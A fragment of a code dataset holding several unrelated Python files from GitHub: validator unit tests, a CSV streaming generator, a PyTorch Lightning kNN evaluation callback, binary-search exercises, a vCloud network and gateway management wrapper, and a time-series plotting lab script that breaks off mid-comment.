\"invalid-keywords\",\n \"incorrect-platform\",\n \"incorrect-os\",\n \"incorrect-arch\",\n])\ndef test_validate_system_keyword_failed(value, message):\n \"\"\"Raise error when 'identifier' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_system_keyword(value)\n\n assert message in str(error)\n\n\ndef test_validate_command_keyword():\n \"\"\"Validate 'command' keyword within data.\"\"\"\n wiz.validator.validate_command_keyword({})\n wiz.validator.validate_command_keyword({\"command\": {\"foo\": \"FooExe\"}})\n\n\n@pytest.mark.parametrize(\"value, options, message\", [\n ({\"command\": {}}, {}, \"'command' should not be empty.\"),\n ({\"command\": 42}, {}, \"'command' has incorrect type.\"),\n (\n {\"command\": 42}, {\"variant_index\": 1},\n \"'variants/1/command' has incorrect type.\"\n ),\n], ids=[\n \"empty\",\n \"incorrect-type\",\n \"variant-index\",\n])\ndef test_validate_command_keyword_failed(value, options, message):\n \"\"\"Raise error when 'command' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_command_keyword(value, **options)\n\n assert message in str(error)\n\n\ndef test_validate_environ_keyword():\n \"\"\"Validate 'environ' keyword within data.\"\"\"\n wiz.validator.validate_environ_keyword({})\n wiz.validator.validate_environ_keyword({\"environ\": {\"key\": \"value\"}})\n\n\n@pytest.mark.parametrize(\"value, options, message\", [\n ({\"environ\": {}}, {}, \"'environ' should not be empty.\"),\n ({\"environ\": 42}, {}, \"'environ' has incorrect type.\"),\n (\n {\"environ\": 42}, {\"variant_index\": 1},\n \"'variants/1/environ' has incorrect type.\"\n ),\n], ids=[\n \"empty\",\n \"incorrect-type\",\n \"variant-index\",\n])\ndef test_validate_environ_keyword_failed(value, options, message):\n \"\"\"Raise error when 'environ' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_environ_keyword(value, **options)\n\n assert message in str(error)\n\n\ndef test_validate_requirements_keyword():\n \"\"\"Validate 'requirements' keyword within data.\"\"\"\n wiz.validator.validate_requirements_keyword({})\n wiz.validator.validate_requirements_keyword({\"requirements\": [\"foo\"]})\n\n\n@pytest.mark.parametrize(\"value, options, message\", [\n ({\"requirements\": []}, {}, \"'requirements' should not be empty.\"),\n ({\"requirements\": 42}, {}, \"'requirements' has incorrect type.\"),\n (\n {\"requirements\": 42}, {\"variant_index\": 1},\n \"'variants/1/requirements' has incorrect type.\"\n ),\n], ids=[\n \"empty\",\n \"incorrect-type\",\n \"variant-index\",\n])\ndef test_validate_requirements_keyword_failed(value, options, message):\n \"\"\"Raise error when 'requirements' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_requirements_keyword(value, **options)\n\n assert message in str(error)\n\n\ndef test_validate_conditions_keyword():\n \"\"\"Validate 'conditions' keyword within data.\"\"\"\n wiz.validator.validate_conditions_keyword({})\n wiz.validator.validate_conditions_keyword({\"conditions\": [\"foo\"]})\n\n\n@pytest.mark.parametrize(\"value, message\", [\n ({\"conditions\": []}, \"'conditions' should not be empty.\"),\n ({\"conditions\": 42}, \"'conditions' has incorrect type.\"),\n], ids=[\n \"empty\",\n \"incorrect-type\",\n])\ndef test_validate_conditions_keyword_failed(value, message):\n \"\"\"Raise error when 'conditions' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_conditions_keyword(value)\n\n assert message in str(error)\n\n\ndef test_validate_variants_keyword():\n \"\"\"Validate 'variants' keyword within data.\"\"\"\n wiz.validator.validate_variants_keyword({})\n wiz.validator.validate_variants_keyword(\n {\n \"variants\": [\n {\n \"identifier\": \"foo\",\n \"install-location\": \"/path/to/install/location\",\n \"command\": {\"foo\": \"FooExe\"},\n \"environ\": {\"key\": \"value\"},\n \"requirements\": [\"foo >= 0.1.0\"]\n }\n ]\n }\n )\n\n\n@pytest.mark.parametrize(\"value, message\", [\n ({\"variants\": []}, \"'variants' should not be empty.\"),\n ({\"variants\": 42}, \"'variants' has incorrect type.\"),\n ({\"variants\": [42]}, \"'variants/0' has incorrect type.\"),\n ({\"variants\": [{\"A\": \"foo\"}]}, \"'variants/0' contains invalid keywords: A\"),\n ({\"variants\": [{}]}, \"'variants/0/identifier' is required.\"),\n (\n {\"variants\": [{\"identifier\": 42}]},\n \"'variants/0/identifier' has incorrect type.\"\n ),\n (\n {\"variants\": [{\"identifier\": \"foo\", \"install-location\": 42}]},\n \"'variants/0/install-location' has incorrect type.\"\n ),\n (\n {\"variants\": [{\"identifier\": \"foo\", \"command\": 42}]},\n \"'variants/0/command' has incorrect type.\"\n ),\n (\n {\"variants\": [{\"identifier\": \"foo\", \"environ\": 42}]},\n \"'variants/0/environ' has incorrect type.\"\n ),\n (\n {\"variants\": [{\"identifier\": \"foo\", \"requirements\": 42}]},\n \"'variants/0/requirements' has incorrect type.\"\n ),\n], ids=[\n \"empty\",\n \"incorrect-type\",\n \"variant-incorrect-type\",\n \"variant-invalid-keywords\",\n \"variant-identifier-missing\",\n \"variant-identifier-incorrect\",\n \"variant-install-location-incorrect\",\n \"variant-command-incorrect\",\n \"variant-environ-incorrect\",\n \"variant-requirements-incorrect\",\n])\ndef test_validate_variants_keyword_failed(value, message):\n \"\"\"Raise error when 'variants' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_variants_keyword(value)\n\n assert message in str(error)\n\n\ndef test_validate_keywords():\n \"\"\"Ensure that no invalid keywords are in data mapping.\"\"\"\n keywords = {\"A\", \"B\"}\n\n wiz.validator.validate_keywords({}, keywords)\n wiz.validator.validate_keywords({\"A\": \"foo\"}, keywords)\n wiz.validator.validate_keywords({\"A\": \"foo\", \"B\": \"bar\"}, keywords)\n\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_keywords({\"A\": \"foo\", \"C\": \"bar\"}, keywords)\n\n assert \"Data contains invalid keywords: C\" in str(error)\n\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_keywords({\"C\": \"bar\"}, keywords, label=\"'test'\")\n\n assert \"'test' contains invalid keywords: C\" in str(error)\n\n\ndef test_validate_required():\n \"\"\"Ensure that data exists.\"\"\"\n wiz.validator.validate_required(\"\")\n wiz.validator.validate_required(\"foo\")\n wiz.validator.validate_required(0)\n wiz.validator.validate_required(42)\n wiz.validator.validate_required(False)\n wiz.validator.validate_required(True)\n wiz.validator.validate_required([])\n wiz.validator.validate_required([1, 2, 3])\n wiz.validator.validate_required({})\n wiz.validator.validate_required({\"A\": \"foo\"})\n wiz.validator.validate_required({1, 2, 3})\n\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_required(None)\n\n assert \"Data is required.\" in str(error)\n\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_required(None, label=\"'test'\")\n\n assert \"'test' is required.\" in str(error)\n\n\ndef test_validate_type():\n \"\"\"Ensure that data has correct type.\"\"\"\n wiz.validator.validate_type(\"foo\", six.string_types)\n wiz.validator.validate_type(\"0.1.0\", six.string_types)\n wiz.validator.validate_type(42, int)\n wiz.validator.validate_type([1, 2, 3], list)\n wiz.validator.validate_type({\"A\": \"foo\"}, dict)\n wiz.validator.validate_type(True, bool)\n\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_type(42, six.string_types)\n\n assert \"Data has incorrect type.\" in str(error)\n\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_type(42, six.string_types, label=\"'test'\")\n\n assert \"'test' has incorrect type.\" in str(error)\n\n\ndef test_validate_not_empty():\n \"\"\"Ensure that data container is not empty.\"\"\"\n wiz.validator.validate_not_empty({\"A\": \"foo\"})\n wiz.validator.validate_not_empty([1, 2, 3])\n\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_not_empty({})\n\n assert \"Data should not be empty.\" in str(error)\n\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_not_empty([], label=\"'test'\")\n\n assert \"'test' should not be empty.\" in str(error)\n","repo_name":"themill/wiz","sub_path":"test/unit/test_validator.py","file_name":"test_validator.py","file_ext":"py","file_size_in_byte":19973,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"43"} +{"seq_id":"72869279169","text":"import json\nfrom dataprep.data_source_manager import DataSourceManager\nimport pandas as pd\n\n\nclass ProcessRealtimeData:\n \"\"\"Class used to process, predict and yield plotting data for one point\n\n \"\"\"\n def __init__(self, csv_path, csv_filename, col_names):\n \"\"\"Class initializer (Constructor)\n\n :param csv_filename: File name ( including path ) of the optional csv file\n used as a data source\n :type: string\n :param csv_path: path to csv data\n :type: string\n :param col_names\n :type: list of string\n \"\"\"\n self.csv_filename = csv_filename\n self.csv_path = csv_path\n self.col_names = col_names\n\n\n def process_points(self):\n \"\"\"Process one point from the prediction data\n This function is a generator that yields messages back to client.\n The messages can be one of two types:\n (1) event: update\n (2) event: jobfinished\n The message 'event: update' contains a json object associated with the\n 'data:' key. The json object contains the prediction data as well as\n plotting data for two PC's (see self.__create_dict())\n An external data source generator (DataSourceManager.csv_line_reader())\n is used to retrieve prediction data one point at a time.\n :return: none NOTE: This class method is a generator, so there is no\n return. However it does yield a JSON serialized dictionary that contains\n the data for plotting the prediction graph\n \"\"\"\n\n # gen is a generator that is an iterable of dictionaries. Each dictionary\n # contains one row of prediction data including timestamp and sensor data\n gen = DataSourceManager.csv_line_reader(self.csv_path, self.csv_filename)\n\n while True:\n row = next(gen, None) # Get next row where row is a dictionary\n if row is None:\n # The value of this yield, when received by the client javascript,\n # will shut down the socket that is used for pushing the\n # prediction data.\n yield \"event: jobfinished\\ndata: \" + \"none\" + \"\\n\\n\"\n break # Terminate this event loop\n else:\n plot_dict = self.__create_plot_dict(row)\n dict_as_json = json.dumps(plot_dict)\n yield \"event: update\\ndata: \" + dict_as_json + \"\\n\\n\"\n\n def __create_plot_dict(self, one_row_dict):\n \"\"\"Private method to create a dictionary\n :param one_row_dict: One row as a DataFrame\n :type: dictionary\n :return: A dictionary of data that will be used for plotting the real time prediction\n \"\"\"\n # Get values of specified keys:\n sensor_values = [one_row_dict[x] for x in self.col_names]\n # Build new dict with specified col_names:\n plot_dict = dict(zip(self.col_names, sensor_values))\n\n return plot_dict\n\n","repo_name":"guiderae/WorkingDemos-RealTimeGraph1","sub_path":"dataprep/process_realtime_data.py","file_name":"process_realtime_data.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"2632817010","text":"# https://github.com/PyTorchLightning/lightning-bolts/blob/0.3.0/pl_bolts/callbacks/knn_online.py#L17-L121\n# https://github.com/PatrickHua/SimSiam/blob/01d7e7811ac7b864bf8adccc8005208878208994/tools/knn_monitor.py\nfrom typing import Optional, Tuple, Union\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom pytorch_lightning import Callback, LightningModule, Trainer\nfrom torch.utils.data import DataLoader\n\nfrom sklearn.neighbors import KNeighborsClassifier\n\nclass KNNOnlineEvaluator(Callback): # pragma: no cover\n \"\"\"\n Evaluates self-supervised K nearest neighbors.\n \n Example::\n \n # your model must have 1 attribute\n model = Model()\n model.num_classes = ... # the num of classes in the model\n \n online_eval = KNNOnlineEvaluator(\n num_classes=model.num_classes,\n )\n \n \"\"\"\n\n def __init__(\n self,\n mode: str,\n num_classes: Optional[int] = None,\n ) -> None:\n \"\"\"\n Args:\n num_classes: Number of classes\n \"\"\"\n \n super().__init__()\n \n self.mode = mode\n self.num_classes = num_classes\n \n self.knn_k = 200 # min(args.train.knn_k, len(memory_loader.dataset))\n self.knn_t = 0.1 \n \n def get_representations(self, pl_module: LightningModule, x: torch.Tensor) -> torch.Tensor:\n with torch.no_grad():\n representations = pl_module(x)\n representations = representations.reshape(representations.size(0), -1)\n return representations\n\n def get_all_representations(\n self, split,\n pl_module: LightningModule,\n dataloader: DataLoader,\n ) -> Tuple[np.ndarray, np.ndarray]:\n all_representations = None\n ys = None\n test = True if split in ['val', 'test'] else False\n \n for batch in dataloader:\n x, y = self.to_device(test=test, batch=batch, device=pl_module.device)\n\n with torch.no_grad():\n representations = F.normalize(self.get_representations(pl_module, x), dim=1)\n\n if all_representations is None:\n all_representations = representations.detach()\n else:\n all_representations = torch.cat([all_representations, representations.detach()])\n\n if ys is None:\n ys = y\n else:\n ys = torch.cat([ys, y])\n\n return all_representations.t().contiguous(), ys\n #return all_representations.cpu().numpy(), ys.cpu().numpy() # type: ignore[union-attr]\n \n def knn_monitor(self, split, pl_module, feature_bank, feature_labels, dataloader):\n pl_module.eval()\n \n total_top1, total_num = 0.0, 0\n test = True if split in ['val', 'test'] else False\n \n with torch.no_grad():\n # loop test data to predict the label by weighted knn search\n #test_bar = tqdm(test_data_loader, desc='kNN', disable=hide_progress)\n #for data, target in test_bar:\n # data, target = data.cuda(non_blocking=True), target.cuda(non_blocking=True)\n \n for batch in dataloader:\n x, y = self.to_device(test=test, batch=batch, device=pl_module.device)\n \n feature = F.normalize(pl_module(x), dim=1)\n \n #feature = net(data)\n #feature = F.normalize(feature, dim=1)\n \n pred_labels = self.knn_predict(feature, feature_bank, feature_labels)\n\n total_num += x.size(0)\n total_top1 += (pred_labels[:, 0] == y).float().sum().item()\n #test_bar.set_postfix({'Accuracy':total_top1 / total_num * 100})\n return total_top1 / total_num\n \n def knn_predict(self, feature, feature_bank, feature_labels):\n # compute cos similarity between each feature vector and feature bank ---> [B, N]\n sim_matrix = torch.mm(feature, feature_bank)\n # [B, K]\n sim_weight, sim_indices = sim_matrix.topk(k=self.knn_k, dim=-1)\n # [B, K]\n sim_labels = torch.gather(feature_labels.expand(feature.size(0), -1), dim=-1, index=sim_indices)\n sim_weight = (sim_weight / self.knn_t).exp()\n\n # counts for each class\n one_hot_label = torch.zeros(feature.size(0) * self.knn_k, self.num_classes, device=sim_labels.device)\n # [B*K, C]\n one_hot_label = one_hot_label.scatter(dim=-1, index=sim_labels.view(-1, 1), value=1.0)\n # weighted score ---> [B, C]\n pred_scores = torch.sum(one_hot_label.view(feature.size(0), -1, self.num_classes) * sim_weight.unsqueeze(dim=-1), dim=1)\n\n pred_labels = pred_scores.argsort(dim=-1, descending=True)\n return pred_labels\n\n def to_device(self, test: bool, batch: torch.Tensor, device: Union[str, torch.device]) -> Tuple[torch.Tensor, torch.Tensor]: \n #print(len(batch), batch)\n #print(len(batch))\n inputs, y = batch\n\n if self.mode in ['simclr', 'simlwclr'] and (not test):\n x = inputs[0]\n x = x.to(device)\n y = y.to(device)\n else:\n x = inputs.to(device)\n y = y.to(device)\n\n return x, y\n\n '''\n def on_validation_epoch_end(self, trainer: Trainer, pl_module: LightningModule) -> None:\n pl_module.knn_evaluator = KNeighborsClassifier(n_neighbors=self.num_classes, n_jobs=-1)\n\n val_dataloader = pl_module.val_dataloader()\n representations, y = self.get_all_representations(pl_module, val_dataloader) # type: ignore[arg-type]\n\n # knn fit\n pl_module.knn_evaluator.fit(representations, y) # type: ignore[union-attr,operator]\n\n # knn val acc\n val_acc = pl_module.knn_evaluator.score(representations, y) # type: ignore[union-attr,operator]\n\n # log metrics\n pl_module.log('online_knn_val_acc', val_acc, on_step=False, on_epoch=True, sync_dist=True)\n '''\n \n #'''\n def on_validation_epoch_end(self, trainer: Trainer, pl_module: LightningModule) -> None:\n \n #train_dataloader = pl_module.train_dataloader()\n val_dataloader = pl_module.val_dataloader()\n\n representations_bank, y = self.get_all_representations(pl_module, val_dataloader)\n val_acc = self.knn_monitor(split='val', pl_module=pl_module, feature_bank=representations_bank, feature_labels=y, dataloader=val_dataloader)\n\n # log metrics\n pl_module.log('online_knn_val_acc', val_acc, on_step=False, on_epoch=True, sync_dist=True)\n #'''","repo_name":"arkel23/layerwiseclr","sub_path":"lwclr/models/online_knn_callback.py","file_name":"online_knn_callback.py","file_ext":"py","file_size_in_byte":6581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"18651659409","text":"from typing import List\n\n# 반복 풀이 240ms\nclass Solution_one:\n def search(self, nums: List[int], target: int) -> int:\n left, right = 0, len(nums)-1\n while left <= right:\n mid = left + (right-left) // 2\n print(mid)\n if nums[mid] == target:\n return mid\n elif nums[mid] < target:\n left = mid + 1\n else:\n right = mid - 1\n return -1\n\n\n# 재귀 풀이 240ms\nclass Solution_two:\n def search(self, nums: List[int], target: int) -> int:\n def binary_search(left, right):\n if left <= right:\n mid = left + (right-left) // 2\n \n if nums[mid] < target:\n return binary_search(mid + 1, right)\n elif nums[mid] > target:\n return binary_search(left, mid - 1)\n else:\n return mid\n else:\n return -1 \n \n return binary_search(0, len(nums)-1)\n\n\n# 이진 검색 모듈 이용 236ms\nclass Solution_three:\n def search(self, nums: List[int], target: int) -> int:\n index = bisect.bisect_left(nums, target)\n \n if index < len(nums) and nums[index] == target:\n return index\n else:\n return -1","repo_name":"leejy001/Algorithm","sub_path":"Python/Binary Search/leetcode_0704.py","file_name":"leetcode_0704.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"10416705831","text":"from pyvcloud.vcd.gateway import Gateway\nfrom pyvcloud.vcd.nat_rule import NatRule\nfrom pyvcloud.vcd.dhcp_pool import DhcpPool\nfrom pyvcloud.vcd.vdc_network import VdcNetwork\nfrom pyvcloud.vcd.firewall_rule import FirewallRule\nfrom pyvcloud.vcd.exceptions import EntityNotFoundException, NotFoundException\n\nfrom .base import VCloudResource\nfrom ..utils import underscore_to_camelcase\nfrom ..exceptions import VCloudSDKException\n\nDESTINATION = 'destination'\nSOURCE = 'source'\nGROUP_OBJECT_LIST = ['securitygroup', 'ipset', 'virtualmachine', 'network']\nVNIC_GROUP_LIST = ['gatewayinterface']\n\nADD_NAT_RULE_TEST_VALUE = {\n 'action': 'dnat',\n 'original_address': '10.10.4.2',\n 'translated_address': '11.11.4.2',\n 'description': 'nat rule test value',\n}\n\nclass VCloudNetwork(VCloudResource):\n\n def __init__(self,\n network_name,\n network_type,\n connection=None,\n vdc_name=None,\n vapp_name=None,\n kwargs=None):\n\n self.network_name = network_name or kwargs.get('network_name')\n self.network_type = network_type\n self.kwargs = kwargs\n if 'network_name' in self.kwargs:\n del self.kwargs['network_name']\n self._network = None\n\n super().__init__(connection, vdc_name, vapp_name)\n\n @property\n def network(self):\n if not self._network:\n try:\n self._network = self.get_network()\n except EntityNotFoundException:\n raise VCloudSDKException(\n 'Network {name} has not been initialized.'.format(\n self.network_name))\n return self._network\n\n @property\n def allocated_addresses(self):\n return self.network.list_allocated_ip_address()\n\n @property\n def connected_vapps(self):\n return self.network.list_connected_vapps()\n\n def get_network(self, network_name=None, network_type=None):\n if network_name and not network_type:\n raise VCloudSDKException(\n 'The method get_network requires both network_name and '\n 'network_type parameters.')\n elif not network_name and not self.network_name:\n raise VCloudSDKException(\n 'The method get_network requires a network_name parameter if '\n 'self.network_name is not set.')\n\n if not network_name:\n network_name = self.network_name\n if not network_type:\n network_type = self.network_type\n\n if network_type == 'routed_vdc_network':\n network_resource = self.vdc.get_routed_orgvdc_network(\n name=network_name)\n elif network_type == 'isolated_vdc_network':\n network_resource = self.vdc.get_isolated_orgvdc_network(\n name=network_name)\n elif network_type == 'directly_connected_vdc_network':\n network_resource = self.vdc.get_direct_orgvdc_network(\n name=network_name)\n else:\n raise VCloudSDKException(\n 'The property network_type {network_type} is not one of '\n '[\\'routed_vdc_network\\', '\n '\\'isolated_vdc_network\\', '\n '\\'directly_connected_vdc_network\\', '\n '\\'vapp_network\\]'.format(network_type=self.network_type))\n return VdcNetwork(self.client, resource=network_resource)\n\n def create(self):\n if self.network_type == 'routed_vdc_network':\n return self.vdc.create_routed_vdc_network(\n network_name=self.network_name, **self.kwargs)\n elif self.network_type == 'isolated_vdc_network':\n return self.vdc.create_isolated_vdc_network(\n network_name=self.network_name, **self.kwargs)\n elif self.network_type == 'directly_connected_vdc_network':\n return self.vdc.create_directly_connected_vdc_network(\n network_name=self.network_name, **self.kwargs)\n elif self.network_type == 'vapp_network':\n if not self.vapp:\n raise VCloudSDKException(\n 'The property network_type is vapp_network,'\n 'but a vapp was not provided.')\n return self.vapp.create_vapp_network(\n name=self.network_name, **self.kwargs)\n else:\n raise VCloudSDKException(\n 'The property network_type {network_type} is not one of '\n '[\\'routed_vdc_network\\', '\n '\\'isolated_vdc_network\\', '\n '\\'directly_connected_vdc_network\\', '\n '\\'vapp_network\\]'.format(network_type=self.network_type))\n\n def delete(self):\n if self.network_type == 'routed_vdc_network':\n return self.vdc.delete_routed_orgvdc_network(self.network_name)\n elif self.network_type == 'isolated_vdc_network':\n return self.vdc.delete_isolated_orgvdc_network(self.network_name)\n elif self.network_type == 'directly_connected_vdc_network':\n return self.vdc.delete_direct_orgvdc_network(self.network_name)\n elif self.network_type == 'vapp_network':\n if not self.vapp:\n raise VCloudSDKException(\n 'The property network_type is vapp_network,'\n 'but a vapp was not provided.')\n return self.vapp.delete_vapp_network(self.network_name)\n else:\n raise VCloudSDKException(\n 'The property network_type {network_type} is not one of '\n '[\\'routed_vdc_network\\', '\n '\\'isolated_vdc_network\\', '\n '\\'directly_connected_vdc_network\\', '\n '\\'vapp_network\\]'.format(network_type=self.network_type))\n\n def add_static_ip_pool_and_dns(self, **kwargs):\n return self.network.add_static_ip_pool_and_dns(**kwargs)\n\n def modify_static_ip_pool(self, **kwargs):\n return self.network.modify_static_ip_pool(**kwargs)\n\n def remove_static_ip_pool(self, **kwargs):\n return self.remove_static_ip_pool(**kwargs)\n\n\nclass VCloudGateway(VCloudResource):\n\n def __init__(self,\n gateway_name,\n connection=None,\n vdc_name=None,\n kwargs=None):\n\n self.gateway_name = gateway_name\n self.kwargs = kwargs\n self._gateway = None\n\n super().__init__(connection, vdc_name)\n\n @property\n def gateway(self):\n if self._gateway:\n self._gateway.reload()\n else:\n self._gateway = self.get_gateway()\n return self._gateway\n\n @property\n def firewall_rules(self):\n return self.gateway.get_firewall_rules_list()\n\n @property\n def firewall_objects(self):\n firewall_objects = {DESTINATION: {}, SOURCE: {}}\n for direction in firewall_objects.keys():\n for group_key in GROUP_OBJECT_LIST + VNIC_GROUP_LIST:\n firewall_objects[direction][group_key] = \\\n self.gateway.list_firewall_objects(direction, group_key)\n return firewall_objects\n\n @property\n def static_routes(self):\n result = self.gateway.get_static_routes()\n return result.items()\n\n @property\n def nat_rules(self):\n return self.gateway.list_nat_rules()\n\n @property\n def dhcp_pools(self):\n out_list = []\n dhcp_resource = self.gateway.get_dhcp()\n if hasattr(dhcp_resource.ipPools, 'ipPool'):\n for ip_pool in dhcp_resource.ipPools.ipPool:\n out_list.append(ip_pool)\n return out_list\n\n @property\n def dhcp_binding(self):\n return self.gateway.list_dhcp_binding()\n\n @property\n def ca_certificates(self):\n return self.gateway.list_ca_certificates()\n\n @property\n def crl_certificates(self):\n return self.gateway.list_crl_certificates()\n\n @property\n def external_network_ip_allocations(self):\n return self.gateway.list_external_network_ip_allocations()\n\n @property\n def exposed_data(self):\n return {\n 'dhcp_pools': self.dhcp_pools,\n 'dhcp_binding': self.dhcp_binding,\n 'crl_certificates': self.crl_certificates,\n 'ca_certificates': self.ca_certificates,\n 'nat_rules': self.nat_rules,\n 'static_routes': self.static_routes,\n 'firewall_rules': self.firewall_rules,\n 'firewall_objects': self.firewall_objects\n }\n\n\n def get_gateway(self, gateway_name=None):\n gateway_name = gateway_name or self.gateway_name\n gateway_resource = self.vdc.get_gateway(gateway_name)\n return Gateway(self.client, resource=gateway_resource)\n\n # FIREWALLS\n def create_firewall_rule(self,\n rule_name,\n _type='User',\n source_values=None,\n destination_values=None,\n services=None,\n action='accept',\n enabled=True,\n logging_enabled=False,\n **kwargs):\n\n # pyvcloud actually has type,\n # but we're not putting that kind of crap in our code.\n _type = kwargs.get('type', _type)\n before_rules = self.get_list_of_rule_ids()\n self.gateway.add_firewall_rule(\n rule_name, action, _type, enabled, logging_enabled)\n new_rule = self.infer_rule(rule_name, before_rules)\n new_rule.edit(source_values, destination_values, services)\n return new_rule.info_firewall_rule()\n\n def delete_firewall_rule(self, rule_name, rule_id):\n firewall_rule = self.infer_rule(rule_name, [rule_id], match=True)\n firewall_rule.delete()\n\n def get_list_of_rule_ids(self):\n all_rules = []\n for firewall_rules in self.gateway.get_firewall_rules():\n for firewall_rule in firewall_rules.firewallRules.firewallRule:\n all_rules.append(firewall_rule.id)\n return all_rules\n\n def infer_rule(self, rule_name, rule_ids=None, match=False):\n for firewall_rule_id in self.get_list_of_rule_ids():\n if not match and firewall_rule_id not in rule_ids:\n rule = FirewallRule(self.client,\n self.gateway_name,\n resource_id=firewall_rule_id)\n rule._reload()\n if rule_name == rule.resource.name:\n return rule\n elif match and firewall_rule_id in rule_ids:\n rule = FirewallRule(self.client,\n self.gateway_name,\n resource_id=firewall_rule_id)\n rule._reload()\n if rule_name == rule.resource.name:\n return rule\n\n # NATS\n def create_nat_rule(self, nat_definition=None):\n nat_definition = nat_definition or ADD_NAT_RULE_TEST_VALUE\n self.gateway.add_nat_rule(**nat_definition)\n return self.get_nat_rule_from_definition(nat_definition)\n\n def delete_nat_rule(self, nat_id=None, nat_definition=None):\n nat_rule = None\n if nat_definition:\n nat_rule = self.get_nat_rule_from_definition(nat_definition)\n elif nat_id:\n nat_rule = NatRule(self.client, self.gateway_name, rule_id=nat_id)\n elif not nat_rule:\n raise VCloudSDKException(\n 'Unable to find nat rule for deletion, because neither '\n 'nat_id {nat_id}, nor nat_definition {definition} '\n 'resolved to any known rules for gateway {gateway}.'.format(\n nat_id=nat_id,\n definition=nat_definition,\n gateway=self.gateway_name))\n return nat_rule.delete_nat_rule()\n\n def get_nat_rule_from_definition(self, nat_definition):\n for rule in self.gateway.list_nat_rules():\n nat_rule = NatRule(\n self.client, self.gateway_name, rule_id=rule['ID'])\n if self.compare_nat_rule(nat_rule.get_nat_rule_info(), nat_definition):\n return nat_rule.get_nat_rule_info()\n return {}\n\n @staticmethod\n def compare_nat_rule(rule_info, definition):\n for k, v in definition.items():\n if k == 'ID':\n continue\n if rule_info[underscore_to_camelcase(k)] != v:\n return False\n return True\n\n # DHCP POOLS\n def add_dhcp_pool(self, **pool_definition):\n self.gateway.add_dhcp_pool(**pool_definition)\n ip_pool = self.get_dhcp_pool_from_ip_range(\n pool_definition.get('ip_range'))\n return ip_pool.get_pool_info()\n\n def delete_dhcp_pool(self, **pool_definition):\n ip_pool = self.get_dhcp_pool_from_ip_range(\n pool_definition.get('ip_range'))\n return ip_pool.delete_pool()\n\n def get_dhcp_pool_from_ip_range(self, ip_range):\n for dhcp_pool in self.dhcp_pools:\n if dhcp_pool.ipRange == ip_range:\n return DhcpPool(self.client,\n self.gateway_name,\n resource_id=dhcp_pool.poolId)\n\n # DHCP BINDINGS\n # def add_dchp_binding(self, **binding_definition):\n # return self.gateway.add_dhcp_binding(**binding_definition)\n #\n","repo_name":"EarthmanT/cloudify-vcd-plugin","sub_path":"vcd_plugin_sdk/resources/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":13423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"17133342712","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Nov 8 10:36:30 2020\r\n\r\n@author: ho\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport statsmodels.api as sm\r\nimport os\r\n\r\nos.chdir('D:/TEACHING/TEACHING KOREA/SEOULTECH/PYTHON/2020 SPRING/LABS/')\r\n\r\npd.date_range('1/1/2020', periods=5)\r\npd.date_range('1/1/2020', periods=5, freq='M')\r\n\r\n# Umbrella Sales Example 우산세일 예제\r\n# Create an umbrella time series (freq=‘Q’) and plot it using plt.plot. 4분기 시계열 데이터로 만든후 그래프로 그리시오. \r\nsales = [125,153,106,88,118,161,133,102,138,144,113,80,109,137,125,109,130,165,128,96]\r\nt = pd.date_range('2015-01', periods=20, freq='Q')\r\ns = pd.Series(sales, index=t)\r\nplt.plot(s)\r\nplt.ylim(0,200)\r\nplt.title('Umbrella Sales')\r\nplt.show()\r\n\r\n# TV Sets Sales Example 티비세트 세일 예제\r\n# Create a tvset time series (freq=‘Q’) and plot it using plt.plot.\r\n# 4분기 시계열 데이터로 만든후 그래프로 그리시오.\r\nsales = [4.8,4.1,6,6.5,5.8,5.2,6.8,7.4,6,5.6,7.5,7.8,6.3,5.9,8,8.4]\r\nt = pd.date_range('2017-01', periods=16, freq='Q')\r\ns = pd.Series(sales, index=t)\r\nplt.plot(s)\r\nplt.ylim(0,10)\r\nplt.title('TV Sets Sales')\r\nplt.xticks(rotation=60)\r\nplt.show()\r\n\r\n# Lawn-Maintenance Expense Example 잔디유지 비용 예제\r\n# Create a lawn-maintenance time series (freq=‘M’) and plot it using plt.plot 월별 시계열 데이터로 만든후 그래프로 그리시오.\r\nlawn = pd.read_excel('lawn.xlsx', header=None)\r\nlawn.columns = ['rev']\r\nlawn.index = pd.date_range('2018-01', periods=36, freq='M')\r\nplt.plot(lawn)\r\nplt.ylim(0,500)\r\nplt.title('Lawn-Maintenance Expense')\r\nplt.xticks(rotation=60)\r\nplt.show()\r\n\r\n# Import the bicycle data. 자전거 데이터를 가져오시오.\r\nsales = [21.6,22.9,25.5,21.9,23.9,27.5,31.5,29.7,28.6,31.4]\r\nt = np.arange(1,11)\r\n\r\n# Plot the time series. 시계열 데이터 그래프 그리기\r\nplt.plot(t, sales)\r\nplt.ylim(0,35)\r\nplt.title('Bicyle Sales')\r\nplt.xlabel('Year')\r\nplt.ylabel('Sales (1000s)')\r\nplt.grid(axis='y', linestyle='--')\r\nplt.show()\r\n\r\n# Conduct a regression analysis and plot the regression equation on the time series plot. 